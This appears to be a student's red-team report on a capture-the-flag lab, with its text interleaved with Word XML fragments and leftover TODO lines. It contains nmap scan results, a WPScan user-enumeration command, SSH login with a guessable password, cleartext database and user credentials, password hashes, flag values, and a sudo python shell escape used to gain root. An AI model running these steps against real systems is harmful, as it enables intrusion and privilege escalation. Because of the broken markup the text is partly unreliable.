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ov3aw6ti033b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xxzsv76gec1f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Exposed Services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Critical Vulnerabilities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Exploitation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symr3udjdsov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Exposed Services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TODO: Fill out the information below.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$ nmap -sV 192.168.1.*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#Starting Nmap 7.80 ( https://nmap.org ) at 2022-02-26 15:14 PST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Nmap scan report for 192.168.1.1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Host is up (0.00054s latency).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Not shown: 995 filtered ports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PORT </w:t>
        <w:tab/>
        <w:t xml:space="preserve">STATE SERVICE   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">VERSION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135/tcp  open  msrpc     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Microsoft Windows RPC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139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn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445/tcp  open  microsoft-ds?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2179/tcp open  vmrdp?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3389/tcp open  ms-wbt-server Microsoft Terminal Services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MAC Address: 00:15:5D:00:04:0D (Microsoft)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Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows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Nmap scan report for 192.168.1.100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Host is up (0.00039s latency).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Not shown: 998 closed ports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PORT </w:t>
        <w:tab/>
        <w:t xml:space="preserve">STATE SERVICE VERSION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22/tcp   open  ssh </w:t>
        <w:tab/>
        <w:t xml:space="preserve">OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)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9200/tcp open  http</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Elasticsearch REST API 7.6.1 (name: elk; cluster: elasticsearch; Lucene 8.4.0)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MAC Address: 4C:EB:42:D2:D5:D7 (Intel Corporate)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Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel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Nmap scan report for 192.168.1.105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Host is up (0.00088s latency).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Not shown: 998 closed ports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PORT   STATE SERVICE VERSION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22/tcp open  ssh </w:t>
        <w:tab/>
        <w:t xml:space="preserve">OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)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80/tcp open  http</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Apache httpd 2.4.29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MAC Address: 00:15:5D:00:04:0F (Microsoft)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Service Info: Host: 192.168.1.105; OS: Linux; CPE: cpe:/o:linux:linux_kernel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Nmap scan report for 192.168.1.110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Host is up (0.00091s latency).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Not shown: 995 closed ports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PORT</w:t>
        <w:tab/>
        <w:t xml:space="preserve">STATE SERVICE </w:t>
        <w:tab/>
        <w:t xml:space="preserve">VERSION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22/tcp  open  ssh     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)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80/tcp  open  http    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Apache httpd 2.4.10 ((Debian))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111/tcp open  rpcbind </w:t>
        <w:tab/>
        <w:t xml:space="preserve">2-4 (RPC #100000)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139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)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445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)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MAC Address: 00:15:5D:00:04:10 (Microsoft)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Service Info: Host: TARGET1; OS: Linux; CPE: cpe:/o:linux:linux_kernel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Nmap scan report for 192.168.1.115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Host is up (0.00038s latency).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Not shown: 995 closed ports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PORT</w:t>
        <w:tab/>
        <w:t xml:space="preserve">STATE SERVICE </w:t>
        <w:tab/>
        <w:t xml:space="preserve">VERSION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22/tcp  open  ssh     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)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80/tcp  open  http    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Apache httpd 2.4.10 ((Debian))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111/tcp open  rpcbind </w:t>
        <w:tab/>
        <w:t xml:space="preserve">2-4 (RPC #100000)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139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)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445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)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MAC Address: 00:15:5D:00:04:11 (Microsoft)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Service Info: Host: TARGET2; OS: Linux; CPE: cpe:/o:linux:linux_kernel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Nmap scan report for 192.168.1.90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Host is up (0.0000070s latency).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Not shown: 999 closed ports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PORT   STATE SERVICE VERSION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22/tcp open  ssh </w:t>
        <w:tab/>
        <w:t xml:space="preserve">OpenSSH 8.1p1 Debian 5 (protocol 2.0)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Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel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Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .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Nmap done: 256 IP addresses (6 hosts up) scanned in 28.24 seconds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Target 1 192.168.1.100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22/tcp  open  ssh     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 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80/tcp  open  http    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Apache httpd 2.4.10 ((Debian))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hd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="24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111/tcp open  rpcbind </w:t>
        <w:tab/>
        <w:t xml:space="preserve">2-4 (RPC #100000)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line="24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139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)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hd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="24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445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)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TODO: Fill out the list below. Include severity, and CVE numbers, if possible.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Target 1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HTTP Port access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Wordpress site using WPscan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Dirb scan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Wpscan –url http://192.168.1.110/wordpress –enumerate u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SSH into an account with open port 22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Ssh michael@192.168.1.110 with password michael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Navigate to /var/www/http/wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="360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cat/nano/less wp-config.php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TODO: Include vulnerability scan results to prove the identified vulnerabilities.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766vyqgx8j1y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Exploitation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TODO: Fill out the details below. Include screenshots where possible.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Red Team was able to penetrate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Target 1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and retrieve the following confidential data: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Target 1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Flag1.txt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flag1{b9bbcb33e11b80be759c4e844862482d}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Exploit Used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Getting into michael’s account via ssh; one avenue of searching is to grep </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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I ended up lessing some of the html files and found the flag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lag2.txt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flag2{fc3fd58dcdad9ab23faca6e9a36e581c}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Exploit Used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Found in the www directory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i w:val="1"/>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Flag3.txt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flag3{afc01ab56b50591e7dccf93122770cd2}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i w:val="1"/>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Found in the mySQL command: wordpress database in the wp_posts table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i w:val="1"/>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Flag4.txt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i w:val="1"/>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Flag4{715dea6c055b9fe3337544932f2941ce}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color w:val="bf0707"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="fff4f4" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo python -c 'import os; os.system("/bin/sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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i w:val="1"/>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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This reverse shells from steven user to root privilege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i w:val="1"/>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Sudo -ls show what command can be executed by user: which steven can execute python scripts without passwords in sudo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="24292f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Using cd: it took me to the root home folder and flag4.txt was in there</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:spacing w:before="120" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr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MySQL username: root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Password: R@v3nSecurity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Michael username: michael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Password: michael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Hash: $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0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Steven username: steven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Password: pink84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Hash: $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/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DB_Charset: utf8mb4 (irrelevant)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Gtfobins.github.io &gt; Search python sudo escalation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